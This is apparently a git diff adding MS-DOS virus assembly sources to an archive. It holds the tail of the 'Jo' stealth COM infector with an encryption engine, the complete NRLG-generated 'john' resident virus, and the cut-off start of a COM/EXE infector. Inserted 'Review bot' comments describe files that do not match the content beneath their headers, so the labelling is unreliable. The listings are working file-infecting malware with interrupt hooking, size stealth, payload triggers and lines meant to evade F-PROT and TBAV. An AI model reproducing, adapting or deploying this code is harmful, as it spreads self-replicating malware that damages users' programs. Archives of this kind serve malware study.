+ cmp si,0 ; Check flag set earlyer
+ je fcb1
+ popf
+ jc repurn ; Check for Handle Search error
+ mov ah,byte ptr es:[bx+16h] ; No error then carry on
+ and ah,01ah ; Check stealth stamp
+ cmp ah,01ah ;
+ jne repurn ;
+ sub word ptr es:[bx+1ah],len ; Infected then take the viri size
+repurn: ret ; from file size.
+fcb1: popf ; Same again but for the FCB
+ cmp al,0ffh
+ je meat_hook
+ cmp byte ptr es:[bx],0ffh
+ jne xx2
+ add bx,7
+xx2: mov ah,byte ptr es:[bx+17h]
+ and ah,01ah
+ cmp ah,01ah
+ jne meat_hook
+ sub word ptr es:[bx+1dh],len
+meat_hook: ret
+
+com_txt db 'COM',0 ;
+
+reset: ; File Attrib routines
+ mov cx,20h
+set_back:
+ mov al,01h
+find_att:
+ mov ah,43h ; Alter file attributes
+i21: pushf
+ call cs:[int21]
+exitsub: ret
+
+checkit: ; Infect routine
+ push es ; Save some more registers
+ push ds
+ push ds ; Check to see if file is a
+ pop es ; .COM file if not then
+ push dx ; quit..
+ pop di ;
+ mov cx,0ffh ; Find '.' in File Name
+ mov al,'.' ;
+ repnz scasb ;
+ push cs ;
+ pop ds ;
+ mov si,offset com_txt ; Compare with COM extension
+ mov cx,3 ;
+ rep cmpsb ;
+ pop ds ; Restore Reg...
+ pop es ;
+ jnz exitsub ;
+
+foundtype: sub di,06h ; Check for commaND.com
+ cmp ds:[di],'DN' ; Quit if found..
+ je exitsub ;
+ mov word ptr cs:[nameptr],dx ; Save DS:DX pointer for later
+ mov word ptr cs:[nameptr+2],ds ;
+ mov al,00h ; Find Attributes of file to infect
+ call find_att ;
+ jc exitsub ; Error Quit.
+
+alteratr: mov cs:[attrib],cx ; Save them
+ call reset ; Reset them to normal
+
+ mov ax,3d02h ; Open file
+ call i21
+ jc exitsub ; Error Quit
+ push cs ; Set DS to CS
+ pop ds ;
+ mov ds:[handle],ax ; Store handle
+
+ mov ax,5700h ; Read file time and date
+ mov bx,ds:[handle] ;
+ call i21 ;
+ke9: mov ds:[date],dx ; Save DX
+ or cx,1ah ; Set Stealth Stamp
+ mov ds:[time],cx ; Save CX
+
+ mov ah,3fh ; Read in first 5 bytes
+ mov cx,05h ; To save them
+ mov dx,offset oldstart ;
+ call i21 ;
+closeit: jc close2 ; Error Quit
+
+ mov ax,4202h ; Move filepointer to end
+ mov cx,0ffffh ; -5 bytes offset from end
+ mov dx,0fffbh ;
+ call i21 ;
+ jc close ; Error Quit
+
+ mov word ptr cs:si_val,ax ; Save File saize for later
+ cmp ax,0ea60h ; See if too big
+ jae close ; Yes then Quit
+
+ mov ah,3fh ; Read in last 5 bytes
+ mov cx,05h ;
+ mov dx,offset tempmem ;
+ call i21 ;
+ jc close ; Error
+
+ push cs ; Reset ES to CS
+ pop es ;
+ mov di,offset tempmem ; Check if Already infected
+ mov si,offset string ;
+ mov cx,5 ;
+ rep cmpsb ;
+ jz close ; Yes the Close and Quit
+
+zapfile: ; No Infect and Be Damned
+ mov ax,word ptr cs:si_val ;
+ add ax,2 ;
+ push cs ;
+ pop ds ;
+ mov word ptr ds:[jpover+1],ax ; Setup new jump
+ call mut_eng ; Call Mutation Engine
+ mov ah,40h ; Save prog to end of file
+ mov bx,cs:[handle] ; Load Handle
+ mov cx,length ; LENGTH OF PROGRAM****
+ call i21 ; Write away
+close2: jc close ; Quit if error
+
+ push cs ; Reset DS to CS
+ pop ds ;
+ mov ax,4200h ; Move File pointer to start
+ xor cx,cx ; of file
+ cwd ; Clever way to XOR DX,DX
+ call i21 ;
+ jc close ; Error Quit..
+
+ mov ah,40h ; Save new start
+ mov cx,03h ;
+ mov dx,offset jpover ;
+ call i21 ;
+
+close: mov ax,5701h ; Restore Time and Date
+ mov bx,ds:[handle] ;
+ mov cx,ds:[time] ;
+ mov dx,ds:[date] ;
+ call i21 ;
+ mov ah,3eh ; Close file
+ call i21 ;
+exit_sub: mov dx,word ptr [nameptr] ; Reset Attributes to as they where
+ mov cx,ds:[attrib] ;
+ mov ds,word ptr cs:[nameptr+2] ;
+ call set_back ;
+ ret ; Return to INT 21h Handler
+
+
+;
+; CyberTech Mutation Engine
+;
+; This is Version Two of the Mutation Engine
+; Unlike others it is very much Virus Specific.. Works
+; Best on Resident Viruses..
+;
+; To Call
+;
+; si_val = File Size
+;
+; Returns
+; DS:DX = Encrypted Virus Code, Use DS:DX pointer to
+; Write From..
+
+
+mut_eng:
+ mov ah,2ch ; Get Time
+ call i21 ;
+ mov word ptr ds:[switch],dx ; Use Sec./100th counter as key
+ mov word ptr ds:[switch2+1],dx ; Save to Decrypt and Encrypt
+ mov ax,cs:[si_val] ; Get file size
+ mov dx,offset main2 ;
+ add ax,dx ;
+ mov word ptr [main+1],ax ; Store to Decrypt offset
+ xor byte ptr [loop_1+2],28h ; Toggle Add/Sub
+ xor byte ptr switch2,28h ; "
+ push cs ; Reset Segment Regs.
+ pop ds ;
+ push cs ;
+ pop ax ; Find Spare Segment
+ sub ax,0bch ; and put in es
+ mov es,ax ;
+ mov si,offset main ; Move Decrypt function
+ mov di,0100h ;
+ mov cx,decryptlen ;
+ rep movsb ;
+ mov si,offset main2 ; Start the code encrypt
+ mov cx,virlen ;
+loop_10: lodsw ;
+switch2: add ax,0000 ;
+ stosw ;
+ loop loop_10 ;
+ mov si,offset string ; move ID string to end
+ mov cx,5 ; new code
+ rep movsb ;
+ mov dx,0100h ; Set Registers to encrypted Virus
+ push es ; Location
+ pop ds ;
+ ret ; Return
+
+; Data Section, contains Messages etc.
+
+
+; Little message to the Wife to Be..
+
+msg db 'Looking Good Slimline Joanna.',0dh,0ah
+ db 'Made in England by Apache Warrior, ARCV Pres.',0dh,0ah,0ah
+ db 'Jo Ver.
1.11 (c) Apache Warrior 92.',0dh,0ah
+ db '$'
+
+msg2 db 'I Love You Joanna, Apache..',0dh,0ah,'$'
+
+virus_name db '[JO]',00h, ; Virus Name..
+author db 'By Apache Warrior, ARCV Pres.' ; Thats me..
+filler dd 0h
+
+oldstart: mov ax,4c00h ; Orginal program start
+ int 21h
+ nop
+ nop
+
+j100h dd 0100h ; Stores for jumps etc
+jpover db 0e9h,00,00h ;
+
+string db '65fd3' ; ID String
+
+:heap ; This code is not saved
+handle dw 0h
+nameptr dd 0h
+attrib dw 0h
+date dw 0h
+time dw 0h
+tempmem db 10h dup (?)
+findat db 0h
+si_val dw 0h
+
+code ends
+
+end start
\ No newline at end of file
diff --git a/MSDOS/Virus.MSDOS.Unknown.john.asm b/MSDOS/Virus.MSDOS.Unknown.john.asm
new file mode 100644
index 00000000..419d782a
--- /dev/null
+++ b/MSDOS/Virus.MSDOS.Unknown.john.asm
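Review bot: This file is a line-for-line duplicate of MSDOS/Virus.MSDOS.Unknown.jo1_11.asm from the same commit, differing only in the data-area label, written `:heap` here against `heap:` in the other copy, and in the missing trailing newline. The `:heap` form is not a label in the MASM-style syntax the rest of the listing uses, so this reads as a corrupted second copy of the same sample rather than a distinct variant. For an archive, keeping a single copy, or recording the relationship between the two filenames in a note, avoids cataloguing one sample twice under different names.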
@@ -0,0 +1,459 @@ +;ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ +;³ THiS iS a [NuKE] RaNDoMiC LiFe GeNeRaToR ViRuS. ³ [NuKE] PoWeR +;³ CReaTeD iS a N.R.L.G. PRoGRaM V0.66 BeTa TeST VeRSioN ³ [NuKE] WaReZ +;³ auToR: aLL [NuKE] MeMeBeRS ³ [NuKE] PoWeR +;³ [NuKE] THe ReaL PoWeR! ³ [NuKE] WaReZ +;³ NRLG WRiTTeR: AZRAEL (C) [NuKE] 1994 ³ [NuKE] PoWeR +;ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ + +.286 +code segment +assume cs:code,ds:code +org 100h + +start: CALL NEXT + +NEXT: + mov di,sp ;take the stack pointer location + mov bp,ss:[di] ;take the "DELTA HANDLE" for my virus + sub bp,offset next ;subtract the large code off this code + ; +;******************************************************************* +; #1 DECRYPT ROUTINE +;******************************************************************* + +cmp byte ptr cs:[crypt],0b9h ;is the first runnig? +je crypt2 ;yes! not decrypt +;---------------------------------------------------------- +mov cx,offset fin ;cx = large of virus +lea di,[offset crypt]+ bp ;di = first byte to decrypt +mov dx,1 ;dx = value for decrypt +;---------------------------------------------------------- +deci: ;deci = fuck label! +;---------------------------------------------------------- + +ÿsub byte ptr [di],07dh +add byte ptr [di],0d5h +not byte ptr [di] +add byte ptr [di],035h +sub byte ptr [di],022h +not byte ptr [di] +add byte ptr [di],034h +add byte ptr [di],012h +inc byte ptr [di] +sub byte ptr [di],0e8h +add word ptr [di],08522h +xor byte ptr [di],058h +inc word ptr [di] +ÿinc di +inc di +;---------------------------------------------------------- +jmp bye ;######## BYE BYE F-PROT ! ########## +mov ah,4ch +int 21h +bye: ;#### HEY FRIDRIK! IS ONLY A JMP!!### +;----------------------------------------------------------- +mov ah,0bh ;######### BYE BYE TBAV ! ########## +int 21h ;### (CANGE INT AT YOU PLEASURE) ### +;---------------------------------------------------------- +loop deci ;repeat please! 
+ ; +;***************************************************************** +; #2 DECRYPT ROUTINE +;***************************************************************** + ; +crypt: ;fuck label! + ; +mov cx,offset fin ;cx = large of virus +lea di,[offset crypt2] + bp ;di = first byte to decrypt +;--------------------------------------------------------------- +deci2: ; +xor byte ptr cs:[di],1 ;decrytion rutine +inc di ;very simple... +loop deci2 ; +;--------------------------------------------------------------- +crypt2: ;fuck label! + ; +MOV AX,0CACAH ;call to my resident interrup mask +INT 21H ;for chek "I'm is residet?" +CMP Bh,0CAH ;is equal to CACA? +JE PUM2 ;yes! jump to runnig program +call action +;***************************************************************** +; NRLG FUNCTIONS (SELECTABLE) +;***************************************************************** + +ÿ;**************************************************************** +; PROCESS TO REMAIN RESIDENT +;**************************************************************** + +mov ax,3521h +int 21h ;store the int 21 vectors +mov word ptr [bp+int21],bx ;in cs:int21 +mov word ptr [bp+int21+2],es ; +;--------------------------------------------------------------- +push cs ; +pop ax ;ax = my actual segment +dec ax ;dec my segment for look my MCB +mov es,ax ; +mov bx,es:[3] ;read the #3 byte of my MCB =total used memory +;--------------------------------------------------------------- +push cs ; +pop es ; +sub bx,(offset fin - offset start + 15)/16 ;subtract the large of my virus +sub bx,17 + offset fin ;and 100H for the PSP total +mov ah,4ah ;used memory +int 21h ;put the new value to MCB +;--------------------------------------------------------------- +mov bx,(offset fin - offset start + 15)/16 + 16 + offset fin +mov ah,48h ; +int 21h ;request the memory to fuck DOS! 
+;--------------------------------------------------------------- +dec ax ;ax=new segment +mov es,ax ;ax-1= new segment MCB +mov byte ptr es:[1],8 ;put '8' in the segment +;-------------------------------------------------------------- +inc ax ; +mov es,ax ;es = new segment +lea si,[bp + offset start] ;si = start of virus +mov di,100h ;di = 100H (psp position) +mov cx,offset fin - start ;cx = lag of virus +push cs ; +pop ds ;ds = cs +cld ;mov the code +rep movsb ;ds:si >> es:di +;-------------------------------------------------------------- +mov dx,offset virus ;dx = new int21 handler +mov ax,2521h ; +push es ; +pop ds ; +int 21h ;set the vectors +;------------------------------------------------------------- +pum2: ; + ; +mov ah,byte ptr [cs:bp + real] ;restore the 3 +mov byte ptr cs:[100h],ah ;first bytes +mov ax,word ptr [cs:bp + real + 1] ; +mov word ptr cs:[101h],ax ; +;------------------------------------------------------------- +mov ax,100h ; +jmp ax ;jmp to execute + ; +;***************************************************************** +;* HANDLER FOR THE INT 21H +;***************************************************************** + ; +VIRUS: ; + ; +cmp ah,4bh ;is a 4b function? +je REPRODUCCION ;yes! jump to reproduce ! +cmp ah,11h +je dir +cmp ah,12h +je dir +dirsal: +cmp AX,0CACAH ;is ... a caca function? (resident chek) +jne a3 ;no! jump to a3 +mov bh,0cah ;yes! put ca in bh +a3: ; +JMP dword ptr CS:[INT21] ;jmp to original int 21h +ret ; +make db '[NuKE] N.R.L.G. 
AZRAEL' +dir: +jmp dir_s +;------------------------------------------------------------- +REPRODUCCION: ; + ; +pushf ;put the register +pusha ;in the stack +push si ; +push di ; +push bp ; +push es ; +push ds ; +;------------------------------------------------------------- +push cs ; +pop ds ; +mov ax,3524H ;get the dos error control +int 21h ;interupt +mov word ptr error,es ;and put in cs:error +mov word ptr error+2,bx ; +mov ax,2524H ;change the dos error control +mov dx,offset all ;for my "trap mask" +int 21h ; +;------------------------------------------------------------- +pop ds ; +pop es ;restore the registers +pop bp ; +pop di ; +pop si ; +popa ; +popf ; +;------------------------------------------------------------- +pushf ;put the registers +pusha ; +push si ;HEY! AZRAEL IS CRAZY? +push di ;PUSH, POP, PUSH, POP +push bp ;PLEEEEEAAAAAASEEEEEEEEE +push es ;PURIFY THIS SHIT! +push ds ; +;------------------------------------------------------------- +mov ax,4300h ; +int 21h ;get the file +mov word ptr cs:[attrib],cx ;atributes +;------------------------------------------------------------- +mov ax,4301h ;le saco los atributos al +xor cx,cx ;file +int 21h ; +;------------------------------------------------------------- +mov ax,3d02h ;open the file +int 21h ;for read/write +mov bx,ax ;bx=handle +;------------------------------------------------------------- +mov ax,5700h ; +int 21h ;get the file date +mov word ptr cs:[hora],cx ;put the hour +mov word ptr cs:[dia],dx ;put the day +and cx,word ptr cs:[fecha] ;calculate the seconds +cmp cx,word ptr cs:[fecha] ;is ecual to 58? (DEDICATE TO N-POX) +jne seguir ;yes! the file is infected! 
+jmp cerrar ; +;------------------------------------------------------------ +seguir: ; +mov ax,4202h ;move the pointer to end +call movedor ;of the file +;------------------------------------------------------------ +push cs ; +pop ds ; +sub ax,3 ;calculate the +mov word ptr [cs:largo],ax ;jmp long +;------------------------------------------------------------- +mov ax,04200h ;move the pointer to +call movedor ;start of file +;---------------------------------------------------------- +push cs ; +pop ds ;read the 3 first bytes +mov ah,3fh ; +mov cx,3 ; +lea dx,[cs:real] ;put the bytes in cs:[real] +int 21h ; +;---------------------------------------------------------- +cmp word ptr cs:[real],05a4dh ;the 2 first bytes = 'MZ' ? +jne er1 ;yes! is a EXE... fuckkk! +;---------------------------------------------------------- +jmp cerrar +er1: +;---------------------------------------------------------- +mov ax,4200h ;move the pointer +call movedor ;to start fo file +;---------------------------------------------------------- +push cs ; +pop ds ; +mov ah,40h ; +mov cx,1 ;write the JMP +lea dx,[cs:jump] ;instruccion in the +int 21h ;fist byte of the file +;---------------------------------------------------------- +mov ah,40h ;write the value of jmp +mov cx,2 ;in the file +lea dx,[cs:largo] ; +int 21h ; +;---------------------------------------------------------- +mov ax,04202h ;move the pointer to +call movedor ;end of file +;---------------------------------------------------------- +push cs ; +pop ds ;move the code +push cs ;of my virus +pop es ;to cs:end+50 +cld ;for encrypt +mov si,100h ; +mov di,offset fin + 50 ; +mov cx,offset fin - 100h ; +rep movsb ; +;---------------------------------------------------------- +mov cx,offset fin +mov di,offset fin + 50 + (offset crypt2 - offset start) ;virus +enc: ; +xor byte ptr cs:[di],1 ;encrypt the virus +inc di ;code +loop enc ; +;--------------------------------------------------------- +mov cx,offset fin +mov di,offset 
fin + 50 + (offset crypt - offset start) ;virus +mov dx,1 +enc2: ; + +ÿdec word ptr [di] +xor byte ptr [di],058h +sub word ptr [di],08522h +add byte ptr [di],0e8h +dec byte ptr [di] +sub byte ptr [di],012h +sub byte ptr [di],034h +not byte ptr [di] +add byte ptr [di],022h +sub byte ptr [di],035h +not byte ptr [di] +sub byte ptr [di],0d5h +add byte ptr [di],07dh +ÿinc di +inc di ;the virus code +loop enc2 ; +;-------------------------------------------- +mov ah,40h ; +mov cx,offset fin - offset start ;copy the virus +mov dx,offset fin + 50 ;to end of file +int 21h ; +;---------------------------------------------------------- +cerrar: ; + ;restore the +mov ax,5701h ;date and time +mov cx,word ptr cs:[hora] ;file +mov dx,word ptr cs:[dia] ; +or cx,word ptr cs:[fecha] ;and mark the seconds +int 21h ; +;---------------------------------------------------------- +mov ah,3eh ; +int 21h ;close the file +;---------------------------------------------------------- +pop ds ; +pop es ;restore the +pop bp ;registers +pop di ; +pop si ; +popa ; +popf ; +;---------------------------------------------------------- +pusha ; + ; +mov ax,4301h ;restores the atributes +mov cx,word ptr cs:[attrib] ;of the file +int 21h ; + ; +popa ; +;---------------------------------------------------------- +pushf ; +pusha ; 8-( = f-prot +push si ; +push di ; 8-( = tbav +push bp ; +push es ; 8-) = I'm +push ds ; +;---------------------------------------------------------- +mov ax,2524H ; +lea bx,error ;restore the +mov ds,bx ;errors handler +lea bx,error+2 ; +int 21h ; +;---------------------------------------------------------- +pop ds ; +pop es ; +pop bp ;restore the +pop di ;resgisters +pop si ; +popa ; +popf ; +;---------------------------------------------------------- +JMP A3 ;jmp to orig. 
INT 21 + ; +;********************************************************** +; SUBRUTINES AREA +;********************************************************** + ; +movedor: ; + ; +xor cx,cx ;use to move file pointer +xor dx,dx ; +int 21h ; +ret ; +;---------------------------------------------------------- +all: ; + ; +XOR AL,AL ;use to set +iret ;error flag + +;*********************************************************** +; DATA AREA +;*********************************************************** +largo dw ? +jump db 0e9h +real db 0cdh,20h,0 +hora dw ? +dia dw ? +attrib dw ? +int21 dd ? +error dd ? + +ÿ;--------------------------------- +action: ;Call label +MOV AH,2AH ; +INT 21H ;get date +CMP Dl,byte ptr cs:[action_dia+bp] ;is equal to my day? +JE cont ;nop! fuck ret +cmp byte ptr cs:[action_dia+bp],32 ; +jne no_day ; +cont: ; +cmp dh,byte ptr cs:[action_mes+bp] ;is equal to my month? +je set ; +cmp byte ptr cs:[action_mes+bp],13 ; +jne NO_DAY ;nop! fuck ret +set: ; +mov AH,9 ;yeah!! +MOV DX,OFFSET PAO ;print my text! +INT 21H ;now! +INT 20H ;an finsh te program +NO_DAY: ;label to incorrect date +ret ;return from call +;--------------------------------- + +ÿ +PAO: +DB 10,13,'you are infected with john virus ver 1.0a','$' + +;***************************************************** +dir_s: + pushf + push cs + call a3 ;Get file Stats + test al,al ;Good FCB? + jnz no_good ;nope + push ax + push bx + push es + mov ah,51h ;Is this Undocmented? huh... 
+ int 21h + mov es,bx + cmp bx,es:[16h] + jnz not_infected + mov bx,dx + mov al,[bx] + push ax + mov ah,2fh ;Get file DTA + int 21h + pop ax + inc al + jnz fcb_okay + add bx,7h +fcb_okay: mov ax,es:[bx+17h] + and ax,1fh ;UnMask Seconds Field + xor al,byte ptr cs:fechad + jnz not_infected + and byte ptr es:[bx+17h],0e0h + sub es:[bx+1dh],OFFSET FIN - OFFSET START ;Yes minus virus size + sbb es:[bx+1fh],ax +not_infected:pop es + pop bx + pop ax +no_good: iret +;******************************************************************** +; THIS DIR STEALTH METOD IS EXTRAC FROM NUKEK INFO JOURNAL 4 & N-POX +;********************************************************************* + +ÿaction_dia Db 08H ;day for the action +action_mes Db 04H ;month for the action +FECHA DW 01eH ;Secon for mark +FECHAd Db 01eH ;Secon for mark dir st +fin: +code ends +end start diff --git a/MSDOS/Virus.MSDOS.Unknown.johnb.asm b/MSDOS/Virus.MSDOS.Unknown.johnb.asm new file mode 100644 index 00000000..282fbde0 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.johnb.asm 
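Review bot: Several lines of this listing begin with a stray `ÿ` (0xFF) byte: before `sub byte ptr [di],07dh` and `inc di` in the first decrypt loop, before the comment banner above the memory-resident section, before `dec word ptr [di]` in the encrypt loop, before the `action` routine's banner, and before `action_dia Db 08H` in the data area. They sit on otherwise ordinary lines and carry no meaning in the surrounding syntax, so they are presumably a code-page or transfer artifact of the archived copy rather than part of the original NRLG-generated text; the archive metadata should record that this copy is not byte-faithful so it is not catalogued as the original listing.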
@@ -0,0 +1,484 @@ +;****************************************************************** +;* * +;* My First Virus, a simple non-overwriting COM and EXE * +;* infector. * +;* by, Joshua * +;* * +;****************************************************************** + +ID = 'SS' ; My ID + + .model tiny ; Memory model + .code ; Start Code + org 100h ; Start of COM file + +MAIN: db 0e9h,00h,00h ; Jmp START_VIRUS + +START proc near + +DECRYPT: mov bx,offset START_VIRUS ; Find out our offset + mov cx,(END_VIRUS-START_VIRUS)/2 +DECRYPT_LOOP: db 2eh,81h,37h ; XOR [BX],xxxx +KEY dw 0 ; Crypt KEY + add bx,2 ; Increment offset + dec cx ; Decrement counter + jnz DECRYPT_LOOP ; Continue until done + +START_VIRUS: + call FIND_OFFSET ; Real start of virus + +; Calculate change in offset from host program. + +FIND_OFFSET: pop bp ; BP holds current IP + sub bp, offset FIND_OFFSET ; Calculate net change + ; Change BP to start of + ; virus code + +; Capture INT 24h Critical error handler. + + push es ; Save ES + mov ax,3524h ; DOS get interupt vector + int 21h ; Call DOS to do it + mov word ptr [bp+OLDINT24],bx ; Save old INT 24h + mov word ptr [bp+OLDINT24+2],es ; vector + mov ah,25h ; DOS set interupt vector + lea dx,[bp+NEWINT24] ; Address of new interupt + int 21h ; Call DOS to do it + pop es ; Restore ES + +; Find out what kind of program I am, COM or EXE, by checking stack pointer. +; This is where I store my ID in an EXE infection. + + cmp sp,ID ; COM or EXE? + je RESTORE_EXE ; I am an EXE file + +; Restore original bytes to the COM program. + +RESTORE_COM: lea si,[bp+COM_START] ; Restore original 3 bytes + mov di,100h ; to 100h, start of file + push di ; Jmp to 100h when done + movsw ; Copy 3 bytes + movsb + jmp short RESTORE_DONE + +; Restore original bytes to the EXE program. 
+ +RESTORE_EXE: push ds ; Save original DS + push es ; Save original ES + push cs ; Set DS = CS + pop ds + push cs ; Set ES = CS + pop es + lea si,[bp+JMPSAVE] ; Copy original CS:IP and + lea di,[bp+JMPSAVE2] ; SS:SP for return + movsw ; Copy 8 bytes + movsw + movsw + movsw + +; Change the DTA from the default so FINDFIRST/FINDNEXT won't destroy +; original command line parameters. + +RESTORE_DONE: lea dx,[bp+DTA] ; Point to new DTA area + mov ah,1ah ; DOS set DTA + int 21h ; Call DOS to do it + +; Save original directory. + + mov ah,47h ; DOS get current directory + lea si,[bp+ORIG_DIR] ; Store it here + mov dl,0 ; Current drive + int 21h ; Call DOS to do it + +; Search for a file to infect. + +SEARCH: lea dx,[bp+EXE_MASK] ; Search for any EXE file + call FINDFIRST ; Begin search + lea dx,[bp+COM_MASK] ; Search for any COM file + call FINDFIRST ; Begin search + + mov ah,3bh ; DOS change directory + lea dx,[bp+DOTDOT] ; Go up one direcotry + int 21h ; Call DOS to do it + jnc SEARCH ; Go look for more files + +; Restore default DTA, original directory, and pass control back to +; original program. + +QUIT: mov ah,3bh ; DOS change directory + lea dx,[bp+ORIG_DIR-1] ; Point to original directory + int 21h ; Call DOS to do it + push ds ; Save DS + mov ax,2524h ; DOS set interupt vector + lds dx,[bp+OLDINT24] ; Restore INT 24h + int 21h ; Call DOS to do it + pop ds ; Restore DS + mov ah,1ah ; DOS set DTA + mov dx,80h ; Restore original DTA + cmp sp,ID-4 ; EXE or COM? 
ES,DS on stack + jz QUIT_EXE ; Pass control to host EXE + +QUIT_COM: int 21h ; Call DOS to set DTA + retn ; Remember, 100h was on stack + +QUIT_EXE: pop es ; Restore original ES + pop ds ; Restore original DS + int 21h ; Call DOS to set DTA + mov ax,es ; AX = begin of PSP segment + add ax,16 ; Add size of PSP to get CS + add word ptr cs:[bp+JMPSAVE2+2],ax ; Restore IP + add ax,word ptr cs:[bp+STACKSAVE2+2] ; Calculate SS + cli ; Clear interrupts + mov sp,word ptr cs:[bp+STACKSAVE2] ; Restore SP + mov ss,ax ; Restore SS + sti ; Set interrupts + db 0eah ; Jump SSSS:OOOO + +JMPSAVE2 dd ? ; CS:IP for EXE return +STACKSAVE2 dd ? ; SS:SP for EXE return +JMPSAVE dd ? ; Original EXE CS:IP +STACKSAVE dd ? ; Original EXE SS:SP + +CREATOR db '[Joshua]' ; That's me! + +; DOS Findfirst / Findnext services + +FINDFIRST: mov ah,4eh ; DOS find first service + mov cx,7 ; Choose files w/ any attribute +FINDNEXT: int 21h ; Call DOS to do it + jc END_SEARCH ; Quit if there are errors + ; or no more files + +; Ok, if I am here, then I found a possible victim. First open the file +; for read only. + + mov al,0 ; DOS Open file, read only + call OPEN ; Open the file + +; Read in the beginning bytes to check for previous infection and then close. + + mov ah,3fh ; DOS Read file + lea dx,[bp+BUFFER] ; Save the original header + mov cx,24 ; Read 24 bytes + int 21h ; Call DOS to do it + mov ah,3eh ; DOS close file + int 21h ; Call DOS to do it + +; Check if the file is an EXE. + +CHECK_EXE: cmp word ptr [bp+BUFFER],'ZM' ; Is it an EXE? + jne CHECK_COM ; Nope, see if it's a COM + cmp word ptr [bp+BUFFER+16],ID; Is it already infected? + je ANOTHER ; Yep, so try another + jmp short INFECT_EXE ; We got one! Go infect it! + + +; Check if the file is COMMAND.COM + +CHECK_COM: cmp word ptr [bp+DTA+35],'DN' ; Check for COMMAND.COM + jz ANOTHER ; If it is, try another file + +; Now, check for previous infection by checking for our presence at +; the end of the file. 
+ + mov ax,word ptr [bp+DTA+26] ; Put total filesize in AX + cmp ax,(65535-(ENDHEAP-DECRYPT)); Check if too big + jle ANOTHER ; If so, try another + mov cx,word ptr [bp+BUFFER+1] ; Put jmp offset in CX + add cx,END_VIRUS-DECRYPT+3 ; Add virus size to jmp offset + cmp ax,cx ; Compare file size's + jnz INFECT_COM ; If healthy, go infect it + +ANOTHER: mov ah,4fh ; Otherwise find another + jmp short FINDNEXT ; possible victim + +END_SEARCH: retn ; No files found + +;*** Subroutine INFECT_COM *** + +INFECT_COM: + +; Save the first three bytes of the COM file + + lea si,[bp+BUFFER] ; Start of first 3 bytes + lea di,[bp+COM_START] ; Store them here + movsw ; Transfer the 3 bytes + movsb + +; Calculate jump offset for header of victim so it will run virus first. +; AX has the filesize. Store new JMP and OFFSET in the buffer. + + mov cx,3 ; No. bytes to write in header + sub ax,cx ; Filesize - jmp_offset + mov byte ptr [si-3],0e9h ; Store new JMP command + mov word ptr [si-2],ax ; plus offset + add ax,(103h+(START_VIRUS-DECRYPT)); New START_VIRUS OFFSET + push ax ; Save it for later + jmp DONE_INFECTION ; We're done! + +;*** Subroutine INFECT_EXE *** + +INFECT_EXE: + +; Save original CS:IP and SS:SP. + + les ax,dword ptr [bp+BUFFER+20] ; Get original CS:IP + mov word ptr [bp+JMPSAVE],ax ; Store IP + mov word ptr [bp+JMPSAVE+2],es ; Store CS + les ax,dword ptr [bp+BUFFER+14] ; Get original SS:SP + mov word ptr [bp+STACKSAVE],es ; Store SP + mov word ptr [bp+STACKSAVE+2],ax ; Store SS + +; Get get the header size in bytes. + + mov ax,word ptr [bp+BUFFER+8] ; Get header size + mov cl,4 ; Convert paragraphs to bytes + shl ax,cl ; Multiply by 16 + xchg ax,bx ; Put header size in BX + +; Get file size. + + les ax,[bp+offset DTA+26] ; Get filesize to + mov dx,es ; DX:AX format + + push ax ; Save filesize + push dx + + sub ax,bx ; Subtract header size + sbb dx,0 ; from filesize + + mov cx,16 ; Convert to SEGMENT:OFFSET + div cx ; form + +; Store new entry point (CS:IP) in header. 
+ + mov word ptr [bp+BUFFER+20],dx; Store IP + mov word ptr [bp+BUFFER+22],ax; Store CS + + add dx,START_VIRUS-DECRYPT ; New START_VIRUS offset + mov bx,dx ; Hold it for now + +; Store new stack frame (SS:SP) in header. + + mov word ptr [bp+BUFFER+14],ax; Store SS + mov word ptr [bp+BUFFER+16],ID; Store SP + + pop dx ; Get back filesize + pop ax + + add ax,END_VIRUS-START_VIRUS ; Add virus size + adc dx,0 ; to filesize + + push ax ; Save AX + mov cl,9 ; Divide AX + shr ax,cl ; by 512 + ror dx,cl + stc ; Set carry flag + adc dx,ax ; Add with carry + pop ax ; Get back AX + and ah,1 ; Mod 512 + +; Store new filesize in header. + + mov word ptr [bp+BUFFER+4],dx ; Store new filesize + mov word ptr [bp+BUFFER+2],ax + + push cs ; Restore ES + pop es + mov cx,24 ; No. bytes to write in header + + push bx ; Save START_VIRUS offset + +; Write virus to victim and restore the file's original timestamp, datestamp, +; and attributes. These values were stored in the DTA by the +; Findfirst / Findnext services. + +DONE_INFECTION: + push cx ; Save no. bytes to write + xor cx,cx ; Clear attributes + call SET_ATTR ; Set attributes + + mov al,2 ; DOS open file for read/write + call OPEN ; Open the file + +; Write the new header at the beginning of the file. + + mov ah,40h ; DOS write to file + pop cx ; Number of bytes to write + lea dx,[bp+BUFFER] ; Point to the bytes to write + int 21h ; Call DOS to do it + +; Move to end of file. + + mov ax,4202h ; DOS set read/write pointer + xor cx,cx ; Set offset move to zero + cwd ; Equivalent to xor dx,dx + int 21h ; Call DOS to do it + +; Append virus to end of file. 
+ + mov ah,2ch ; DOS get time + int 21h ; Call DOS to do it + mov [bp+KEY],dx ; Save sec + 1/100 sec + ; as the new KEY + + lea di,[bp+APPEND] ; to the heap + mov cx,START_VIRUS-DECRYPT ; Number of bytes to move + mov al,53h ; Push BX and store it + stosb ; in the append routine + lea si,[bp+DECRYPT] ; Move Crypt routines + push si ; Save SI + push cx ; Save CX + rep movsb ; Transfer the data + + lea si,[bp+WRITE_START] ; Now copy the write + mov cx,WRITE_END-WRITE_START ; routine to the heap + rep movsb ; Transfer the data + + pop cx ; Get back + pop si ; CX and SI + rep movsb ; Recopy Crypt routine + + mov ax,0c35bh ; Tack a POP BX and + stosw ; RETN on the end + + pop ax ; New START_VIRUS offset + mov word ptr [bp+DECRYPT+1],ax; Store new offset + + call APPEND ; Write the file + +; Restore original creation date and time. + + mov ax,5701h ; DOS set file date & time + mov cx,word ptr [bp+DTA+22] ; Set time + mov dx,word ptr [bp+DTA+24] ; Set date + int 21h ; Call DOS to do it + +; Close the file. + + mov ah,3eh ; DOS close file + int 21h ; Call DOS to do it + +; Restore original file attributes. + + mov 